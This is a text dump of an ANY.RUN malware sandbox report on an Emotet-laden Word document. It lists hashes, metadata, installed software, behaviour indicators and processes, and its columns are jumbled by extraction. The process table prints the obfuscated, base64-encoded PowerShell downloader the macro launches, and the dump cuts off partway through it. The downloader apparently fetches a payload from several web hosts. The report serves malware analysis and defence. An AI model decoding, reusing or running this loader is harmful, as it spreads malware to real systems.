21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.
RUN - Malware Sandbox Online
General Info
File name: CMO-100120 CDW-102220.doc
Full analysis: https://app.any.run/tasks/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19
Verdict: Malicious activity
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even
private users get infected in mass spam email campaigns.
Analysis date: August 06, 2021 at 16:53:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros macros-on-open generated-doc emotet-doc emotet loader trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Minima., Author: Mael Schneider, Template: Normal.dotm, Last Saved By: Noa Masson,
Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 22 07:54:00 2020, Last Saved Time/Date: Thu Oct 22 07:54:00 2020, Number of Pages: 1,
Number of Words: 3675, Number of Characters: 20950, Security: 8
MD5: 27E3A6A2A661389C26F2CA9CBF39CC0F
SHA1: 91257B16C8EA0A0C236F9824672ABF04E118C5C9
SHA256: E2D2EBAFC33D7C7819F414031215C3669BCCDFB255AF3CBE0177B2C601B0E0CD
SSDEEP: 3072:aJivKie6B/w2yiWydwLQ/qR+zAf0Yjau23RW9Wn:aJiP/w2PtqReAf0YjARW9
Software environment set and analysis options
Launch configuration
Task duration: 300 seconds Heavy Evasion option: off Network geolocation: off
Additional time used: 240 seconds MITM proxy: off Privacy: Public submission
Fakenet option: off Route via Tor: off Autoconfirmation of UAC: on
Network: on
Software preset Hotfixes
Internet Explorer 11.0.9600.19596 KB4534251 Client LanguagePack Package
Adobe Acrobat Reader DC (20.013.20064) Client Refresh LanguagePack Package
Adobe Flash Player 32 ActiveX (32.0.0.453) CodecPack Basic Package
Adobe Flash Player 32 NPAPI (32.0.0.453) Foundation Package
Adobe Flash Player 32 PPAPI (32.0.0.453) IE Hyphenation Parent Package English
Adobe Refresh Manager (1.8.0) IE Spelling Parent Package English
CCleaner (5.74) IE Troubleshooters Package
FileZilla Client 3.51.0 (3.51.0) InternetExplorer Optional Package
Google Chrome (86.0.4240.198) InternetExplorer Package TopLevel
Google Update Helper (1.3.36.31) KB2479943
Java 8 Update 271 (8.0.2710.9) KB2491683
Java Auto Updater (2.8.271.9) KB2506212
Microsoft .NET Framework 4.5.2 (4.5.51209) KB2506928
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000) KB2532531
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000) KB2533552
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000) KB2533623
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000) KB2534111
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000) KB2545698
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000) KB2547666
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2552343
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000) KB2560656
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000) KB2564958
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013) KB2574819
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB2579686
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000) KB2585542
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000) KB2604115
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000) KB2620704
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000) KB2621440
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000) KB2631813
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000) KB2639308
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2640148
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000) KB2653956
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000) KB2654428
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013) KB2656356
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000) KB2660075
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000) KB2667402
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 1/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000) KB2676562
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000) KB2685811
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000) KB2685813
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2685939
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000) KB2690533
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000) KB2698365
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013) KB2705219
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000) KB2719857
Microsoft Office IME (Korean) 2010 (14.0.4763.1000) KB2726535
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000) KB2727528
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000) KB2729094
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000) KB2729452
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000) KB2731771
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000) KB2732059
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2736422
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000) KB2742599
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000) KB2750841
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013) KB2758857
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000) KB2761217
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000) KB2770660
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000) KB2773072
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000) KB2786081
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000) KB2789645
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000) KB2799926
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000) KB2800095
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000) KB2807986
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013) KB2808679
Microsoft Office O MUI (French) 2010 (14.0.4763.1000) KB2813347
Microsoft Office O MUI (German) 2010 (14.0.4763.1000) KB2813430
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000) KB2820331
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000) KB2834140
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000) KB2836942
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2836943
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000) KB2840631
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000) KB2843630
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013) KB2847927
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000) KB2852386
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000) KB2853952
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000) KB2857650
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000) KB2861698
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000) KB2862152
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000) KB2862330
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2862335
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000) KB2864202
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000) KB2868038
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013) KB2871997
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000) KB2884256
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000) KB2891804
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000) KB2893294
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000) KB2893519
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000) KB2894844
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000) KB2900986
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2908783
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000) KB2911501
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000) KB2912390
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013) KB2918077
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000) KB2919469
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000) KB2923545
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000) KB2931356
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000) KB2937610
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000) KB2943357
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000) KB2952664
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2968294
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000) KB2970228
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000) KB2972100
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013) KB2972211
Microsoft Office Professional 2010 (14.0.6029.1000) KB2973112
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000) KB2973201
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000) KB2977292
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000) KB2978120
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000) KB2978742
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 2/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Proof (English) 2010 (14.0.6029.1000) KB2984972
Microsoft Office Proof (French) 2010 (14.0.6029.1000) KB2984976
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000) KB2984976 SP1
Microsoft Office Proof (German) 2010 (14.0.4763.1000) KB2985461
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000) KB2991963
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000) KB2992611
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000) KB2999226
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3004375
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000) KB3006121
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000) KB3006137
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013) KB3010788
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000) KB3011780
Microsoft Office Proofing (English) 2010 (14.0.6029.1000) KB3013531
Microsoft Office Proofing (French) 2010 (14.0.4763.1000) KB3019978
Microsoft Office Proofing (German) 2010 (14.0.4763.1000) KB3020370
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000) KB3020388
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000) KB3021674
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000) KB3021917
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3022777
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000) KB3023215
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000) KB3030377
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013) KB3031432
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000) KB3035126
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000) KB3037574
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000) KB3042058
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000) KB3045685
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000) KB3046017
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000) KB3046269
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3054476
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000) KB3055642
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000) KB3059317
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013) KB3060716
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000) KB3061518
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000) KB3067903
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000) KB3068708
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000) KB3071756
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000) KB3072305
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3074543
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000) KB3075226
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000) KB3078667
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013) KB3080149
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000) KB3086255
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000) KB3092601
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000) KB3093513
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000) KB3097989
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000) KB3101722
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000) KB3102429
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3102810
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000) KB3107998
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000) KB3108371
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013) KB3108664
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB3109103
Microsoft Office Single Image 2010 (14.0.6029.1000) KB3109560
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000) KB3110329
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000) KB3115858
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000) KB3118401
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000) KB3122648
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000) KB3123479
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000) KB3126587
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3127220
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000) KB3133977
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000) KB3137061
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013) KB3138378
Microsoft Office X MUI (French) 2010 (14.0.4763.1000) KB3138612
Microsoft Office X MUI (German) 2010 (14.0.4763.1000) KB3138910
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000) KB3139398
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000) KB3139914
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000) KB3140245
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3147071
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000) KB3150220
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000) KB3150513
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 3/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013) KB3155178
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161) KB3156016
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219) KB3159398
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0) KB3161102
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005) KB3161949
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005) KB3170735
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2) KB3172605
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702) KB3179573
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702) KB3184143
Mozilla Firefox 83.0 (x86 en-US) (83.0) KB3185319
Mozilla Maintenance Service (83.0.0.7621) KB4019990
Notepad++ (32-bit x86) (7.9.1) KB4040980
Opera 12.15 (12.15.1748) KB4474419
QGA (2.14.33) KB4490628
Skype version 8.29 (8.29) KB4524752
VLC media player (3.0.11) KB4532945
WinRAR 5.91 (32-bit) (5.91.0) KB4536952
KB4567409
KB958488
KB976902
KB982018
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
Package 21 for KB2984976
Package 38 for KB2984976
Package 45 for KB2984976
Package 59 for KB2984976
Package 7 for KB2984976
Package 76 for KB2984976
PlatformUpdate Win7 SRV08R2 Package TopLevel
ProfessionalEdition
RDP BlueIP Package TopLevel
RDP WinIP Package TopLevel
RollupFix
UltimateEdition
WUClient SelfUpdate ActiveX
WUClient SelfUpdate Aux TopLevel
WUClient SelfUpdate Core TopLevel
Behavior activities
MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process Checks supported languages Reads the computer name
regidle.exe (PID: 3164) POwersheLL.exe (PID: 3828) WINWORD.EXE (PID: 2728)
G_jugk.exe (PID: 1640) regidle.exe (PID: 3164)
Creates files in the user directory
G_jugk.exe (PID: 1640)
EMOTET was detected WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the computer name
Checks supported languages
POwersheLL.exe (PID: 3828)
Drops executable file immediately after starts WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164)
G_jugk.exe (PID: 1640)
G_jugk.exe (PID: 1640) Reads mouse settings
Connects to CnC server WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the date of Windows installation
POwersheLL.exe (PID: 3828) Reads Microsoft Office registry keys
WINWORD.EXE (PID: 2728)
PowerShell script executed
POwersheLL.exe (PID: 3828)
Creates files in the user directory
POwersheLL.exe (PID: 3828)
Reads Environment values
POwersheLL.exe (PID: 3828)
Executed via WMI
POwersheLL.exe (PID: 3828)
G_jugk.exe (PID: 1640)
Executable content was dropped or overwritten
POwersheLL.exe (PID: 3828)
G_jugk.exe (PID: 1640)
Starts itself from another location
G_jugk.exe (PID: 1640)
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 4/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Malware configuration
No Malware configuration.
Static information
TRiD EXIF
.doc | Microsoft Word document (54.2) FlashPix
.doc | Microsoft Word document (old ver.) (32.2) Title: Minima.
Subject:
Author: Mael Schneider
Keywords:
Comments:
Template: Normal.dotm
LastModifiedBy: Noa Masson
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 0
CreateDate: 2020:10:22 06:54:00
ModifyDate: 2020:10:22 06:54:00
Pages: 1
Words: 3675
Characters: 20950
Security: Locked for annotations
Company:
Lines: 174
Paragraphs: 49
CharCountWithSpaces: 24576
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs: Title
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
TagE: Sapiente animi numquam iure aut. Tempore saepe nam aut
ratione ipsa vel tempore quae. Sequi repellendus quia et
voluptatem.
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Video and screenshots
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 5/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Processes
Total processes Monitored processes Malicious processes Suspicious processes
45 4 2 1
Behavior graph
start winword.exe
no specs
powershell.exe
#EMOTET
g_jugk.exe drop and start regidle.exe
Specs description
Program did not start Low-level access to the HDD Process was added to the startup Debug information is available
Probably Tor was used Behavior similar to spam Task has injected processes Executable file was dropped
Known threat RAM overrun Network attacks were detected Integrity level elevation
Connects to the network CPU overrun Process starts the services System was rebooted
Application downloaded the Actions similar to stealing personal
Task contains several apps running Task has apps ended with an error
executable file data
File is detected by antivirus software Inspected object has suspicious PE Behavior similar to exploiting Task contains an error or was
structure the vulnerability rebooted
The process has the malware config
Process information
PID CMD Path Indicators Parent process
2728 "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Program Files\Microsoft Office\Office14\WINWORD.EXE — Explorer.EXE
"C:\Users\admin\AppData\Local\Temp\CMO-100120 CDW-
102220.doc"
Information
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 6/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
User: admin Company: Microsoft Corporation
3828
IntegrityPOwersheLL
Level: -ENCOD
MEDIUM Description: C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.e
Microsoft Word wmiprvse.exe
IABTAGUAVAAtAEkAVABFAE0AIABWAGEAcgBpAGEAYgBsAGUA xe
Version:OgBWAGgARAAyADkANQAgACAAKAAgACAAWwBUAHkAcABlAF
14.0.6024.1000
0AKAAiAHsAMgB9AHsANAB9AHsAMQB9AHsAMwB9AHsAMAB
9ACIAIAAtAGYAJwAuAGQASQByAEUAQwB0AG8AUgBZACcALA
AnAFQARQBtAC4AJwAsACcAUwBZACcALAAnAGkATwAnACwA
JwBzACcAKQApADsAIAAgACAAJAB0AHcAOQA9AFsAdAB5AHA
AZQBdACgAIgB7ADMAfQB7ADUAfQB7ADYAfQB7ADEAfQB7ADc
AfQB7ADAAfQB7ADgAfQB7ADIAfQB7ADQAfQAiAC0AZgAgACcA
TQBhAG4AYQAnACwAJwBWAEkAYwBlAHAAbwBpACcALAAnAG
UAJwAsACcAUwB5AFMAJwAsACcAUgAnACwAJwBUAGUAbQA
uAG4AZQBUAC4AUwAnACwAJwBlAHIAJwAsACcAbgB0ACcALA
AnAGcAJwApACAAIAA7ACAAJABJADAAcgBlADIAMwBlAD0AKA
AnAFgAZwAnACsAJwBzAGQAJwArACgAJwBfADAAJwArACcAc
gAnACkAKQA7ACQAWQAzADgAMABvADEAZgA9ACQASQBxAH
AANQB1AGUAYQAgACsAIABbAGMAaABhAHIAXQAoADYANAAp
ACAAKwAgACQARAB4AGQAOABvAHYAeAA7ACQASAA0AHgAc
QBpAGIAagA9ACgAKAAnAEEAaQAnACsAJwBsAHQAJwApACsA
KAAnAHYAJwArACcAOABuACcAKQApADsAIAAkAFYASABkADIA
OQA1ADoAOgAiAEMAcgBFAGAAQQB0AGUAZABJAFIAZQBgAG
MAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnA
HMAJwArACgAJwBhACcAKwAnAGMASgAnACkAKwAoACcAZQ
AnACsAJwBoAGgAegAnACsAJwBkAGEAJwApACsAKAAnAHMA
YQAnACsAJwBjACcAKQArACgAJwBCAGUAbgAxADQAJwArACc
AZgAnACsAJwByAHMAYQBjACcAKQApAC4AIgByAEUAYABQAE
wAQQBDAEUAIgAoACgAJwBzAGEAJwArACcAYwAnACkALAAnA
FwAJwApACkAKQA7ACQAUQA1AG8AbQAyAHgAdQA9ACgAJwB
ZACcAKwAoACcAeQAnACsAJwBhAGUAegAnACsAJwBpAHYAJ
wApACkAOwAgACAAKABDAEgAaQBsAEQASQBUAGUAbQAgACg
AJwBWAGEAcgAnACsAJwBpAGEAQgBsAEUAOgBUACcAKwAnA
FcAJwArACcAOQAnACkAIAApAC4AdgBBAEwAdQBlADoAOgAiA
HMARQBjAFUAcgBgAGkAdAB5AHAAcgBgAG8AVABvAGMAYAB
PAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQ
ArACcAMgAnACkAOwAkAE4AegA1AGcAbABiAGwAPQAoACgAJ
wBFADQANQAnACsAJwBtACcAKQArACcANQAnACsAJwBzAGkA
JwApADsAJABHAHIAcQA0ADAAMwBsACAAPQAgACgAKAAnAE
cAXwBqACcAKwAnAHUAJwApACsAJwBnACcAKwAnAGsAJwAp
ADsAJABRAGoAcABzAHYAYQBmAD0AKAAoACcAVQB4ADAAXw
AnACsAJwA4AGQAJwApACsAJwBnACcAKQA7ACQAUAB0AGQA
ZwA5ADUAaAA9ACgAKAAnAEwAcAAnACsAJwA1ADcAJwApAC
sAKAAnADEAMAAnACsAJwBhACcAKQApADsAJABTAGcAdwBx
ADcANwA5AD0AJABIAE8ATQBFACsAKAAoACgAJwBGADUAQgB
KACcAKwAnAGUAaAAnACkAKwAnAGgAegAnACsAJwBkACcAK
wAoACcAYQBGADUAJwArACcAQgBCACcAKQArACgAJwBlAG4A
MQAnACsAJwA0AGYAJwArACcAcgBGADUAQgAnACkAKQAuACI
AUgBlAFAAbABgAEEAQwBlACIAKAAoAFsAQwBoAEEAcgBdADc
AMAArAFsAQwBoAEEAcgBdADUAMwArAFsAQwBoAEEAcgBdA
DYANgApACwAWwBzAHQAcgBpAG4ARwBdAFsAQwBoAEEAcgB
dADkAMgApACkAKwAkAEcAcgBxADQAMAAzAGwAKwAoACcAL
gAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABHAHcA
ZwA5ADgAdQAxAD0AKAAnAEEANwAnACsAJwBiAHoAJwArACg
AJwA2ACcAKwAnAHMAbQAnACkAKQA7ACQAUwBsAGwAOABv
AGsAdQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQB
jACcAKwAnAHQAJwApACAAbgBFAHQALgBXAGUAYgBDAEwAS
QBFAG4AdAA7ACQARwBfAGEAdwBoAGkAOQA9ACgAKAAnAGg
AdAB0AHAAOgA9ACcAKwAnAFAATwAnACsAJwAzACcAKQArAC
cAMgA9ACcAKwAoACcAUABPADMAMgBlACcAKwAnAHUAYgBh
ACcAKwAnAG4AawBzACcAKwAnADcALgAnACsAJwBjAG8AJwA
pACsAJwBtAD0AJwArACcAUABPACcAKwAnADMAJwArACgAJw
AyAGEAZABtAGkAJwArACcAbgBpACcAKQArACgAJwBzAHQAcg
AnACsAJwBhAHQAbwByAD0AJwArACcAUAAnACkAKwAnAE8A
MwAnACsAKAAnADIAJwArACcAdQBiACcAKQArACgAJwBkAEQ
AYgAnACsAJwBCAD0AUABPACcAKwAnADMAJwArACcAMgBAA
GgAJwApACsAJwB0AHQAJwArACgAJwBwAHMAJwArACcAOg
AnACkAKwAnAD0AJwArACgAJwBQACcAKwAnAE8AMwAnACkA
KwAoACcAMgAnACsAJwA9AFAAJwApACsAKAAnAE8AJwArACc
AMwAnACsAJwAyAGUAcgBrACcAKQArACgAJwBhAGwAYQAnA
CsAJwAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAn
ACsAJwA9AFAATwAzADIAdwBwAC0AYQAnACsAJwBkAG0AJwA
pACsAJwBpACcAKwAnAG4AJwArACgAJwA9AFAATwAnACsAJw
AzACcAKQArACcAMgAnACsAJwBtAGkAJwArACgAJwA1ACcAK
wAnAG0APQAnACkAKwAoACcAUAAnACsAJwBPADMAMgBAAC
cAKQArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwADoAPQAn
ACkAKwAoACcAUAAnACsAJwBPADMAMgAnACkAKwAnAD0AU
AAnACsAJwBPACcAKwAoACcAMwAyACcAKwAnAGwAaQAnACs
AJwBkAG8AcgBhAGcAZwBpAG8AZAAnACsAJwBpACcAKQArAC
cAcwBvACcAKwAoACcAbAAnACsAJwBlAC4AaQB0AD0AJwArA
CcAUABPADMAJwApACsAJwAyACcAKwAnAGMAJwArACgAJw
BnAGkAJwArACcALQAnACkAKwAoACcAYgBpACcAKwAnAG4AP
QBQAE8AJwApACsAJwAzADIAJwArACcAegAnACsAKAAnAEwA
JwArACcARwA4ACcAKwAnADcAOQA9AFAAJwApACsAKAAnAE
8AMwAyACcAKwAnAEAAaAAnACkAKwAoACcAdAAnACsAJwB0
AHAAOgAnACkAKwAoACcAPQAnACsAJwBQAE8AJwApACsAKA
AnADMAMgAnACsAJwA9AFAAJwApACsAJwBPACcAKwAnADM
AMgAnACsAJwBuACcAKwAnAGkAJwArACgAJwBjACcAKwAnAG
sAJwArACcAagBlAGgAbABlAG4ALgBjAG8AJwArACcAbQA9AFA
AJwArACcATwAzADIAbwBsAGQAJwApACsAKAAnAHMAJwArA
